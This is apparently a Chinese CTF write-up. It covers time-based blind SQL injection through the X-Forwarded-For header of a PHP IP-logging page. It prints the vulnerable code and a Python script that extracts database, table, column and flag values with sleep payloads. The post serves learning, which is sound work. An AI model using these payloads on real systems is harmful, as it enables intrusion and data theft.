标签:ade port 使用 isset 电商 表名 def 消息 目的
error_reporting(0); function getIp(){ $ip = ‘‘; if(isset($_SERVER[‘HTTP_X_FORWARDED_FOR‘])){ $ip = $_SERVER[‘HTTP_X_FORWARDED_FOR‘]; }else{ $ip = $_SERVER[‘REMOTE_ADDR‘]; } $ip_arr = explode(‘,‘, $ip); return $ip_arr[0]; } $host="localhost"; $user=""; $pass=""; $db=""; $connect = mysql_connect($host, $user, $pass) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); $ip = getIp(); echo ‘your ip is :‘.$ip; $sql="insert into client_ip (ip) values (‘$ip‘)"; //将得到的IP插入到数据库 mysql_query($sql);
将消息插入数据库
一般出现地方:电商生成订单接口存在INSERT型SQL注入漏洞,可修改订单金额数据,生成订单时会往数据库插入数据,但此处使用了动态查询语句的方式进行插入,通过注入数据可以达到篡改订单数据的目的
本题注入点X_FORWARDED_FOR
1 import requests 2 import sys 3 import string 4 5 def getdblen(url): #获得库名长度 6 sql="1‘+(select case when(select length(database())={0}) then sleep(4) else 1 end) and ‘1‘=‘1" 7 for i in range(1,50): 8 header={‘X-Forwarded-For‘:sql.format(str(i))} 9 try: 10 s=requests.get(url,headers=header,timeout=3) 11 except: 12 print("database name len:",i) 13 break 14 15 def gettablelen(url): #获得数据表名长度 没有输出 不知道错误在哪 很烦~~,查不到错误。有没有limit 都没有输出 16 #limit的作用是查询到好几行数据,选取其中的几行 limit 1,1就是 第二行一行的数据(从0开始计算行数) 17 sql="‘+(select case when(select length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1}) then sleep(4) else 1 end) and ‘1‘=‘1" 18 for n in range(0,5): 19 for i in range(1,20): 20 header={‘X-Forwarded-For‘:sql.format(str(n),str(i))} 21 try: 22 s=requests.get(url,headers=header,timeout=3) 23 except: 24 print("table %s name len:%d"%(n,i)) 25 break 26 27 def getdb(url): 28 database_name=‘‘ 29 sql="1‘ and (case when (substr((select database()) from {0} for 1)=‘{1}‘) then sleep(4) else 1 end) and ‘1‘=‘1" 30 #逐个字母破解数据库名,{0}、{1}相当于标记了两处变量,用于下面的format语句 31 for i in range(1,10): #猜测数据库名字在9个字符以内 32 for str in range(32,129): #通过循环,逐个字母匹配 33 if chr==128: 34 sys.exit(0)#如果没有匹配,就退出循环 35 header={‘X-Forwarded-For‘:sql.format(i,chr(str))} 36 try: 37 s=requests.get(url,headers=header,timeout=3) 38 except: 39 database_name+=chr(str) 40 print(database_name) 41 break 42 return database_name 43 44 def gettable(url): 45 table_name=‘‘ 46 payload="‘+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)=‘{1}‘) then sleep(4) else 1 end) and ‘1‘=‘1" 47 guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation 48 for i in range(1,50): 49 #print(i) 50 for str in guess: 51 if ord(str)==128: 52 sys.exit(0) 53 header={‘X-Forwarded-For‘:payload.format(i,str)} 54 try: 55 s=requests.get(url,headers=header,timeout=3) 56 except: 57 table_name+=str 58 print(table_name) 59 break 60 return table_name 61 62 def getcolumn(url): 63 column_name=‘‘ 64 sql="‘+(select case when (substr((select group_concat(column_name) from information_schema.columns where table_name=‘flag‘) from {0} for 1)=‘{1}‘) then sleep(4) else 1 end) and ‘1‘=‘1" 65 #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation 66 for i in range(20): 67 for str in range(32,129): 68 if str==128: 69 sys.exit(0) 70 payload={‘X-Forwarded-For‘:sql.format(i,chr(str))} 71 try: 72 s=requests.get(url,headers=payload,timeout=3) 73 except: 74 column_name+=chr(str) 75 print(column_name) 76 break 77 return column_name 78 79 def getmessage(url): 80 message=‘‘ 81 sql="‘+(select case when(substr((select group_concat(flag) from flag)from {0} for 1)=‘{1}‘) then sleep(4) else 1 end) and ‘1‘=‘1" 82 for i in range(1,35): 83 for str in range(32,129): 84 if str==128: 85 sys.exit(0) 86 payload={‘X-Forwarded-For‘:sql.format(i,chr(str))} 87 try: 88 s=requests.get(url,headers=payload,timeout=3) 89 except: 90 message+=chr(str) 91 print(message) 92 break 93 return message 94 95 96 if __name__==‘__main__‘: 97 url="http://123.206.87.240:8002/web15/" 98 print(getdb(url)) 99 #tablename = gettable(url) 100 #print(tablename) 101 #columname = getcolumn(url) 102 #message=getmessage(url) 103 104 #print(temp.lower()) 105 #getdblen(url) 106 #gettablelen(url) 107 #getdb(url) 108
代码借鉴了其他人的wp,并加上自己的一点想法,查询名长度等
总结:要加强写脚本的能力,多学习mysql语句,有好几个语句是因为不对才没有注入成功的。
标签:ade port 使用 isset 电商 表名 def 消息 目的
原文地址:https://www.cnblogs.com/liqik/p/11025897.html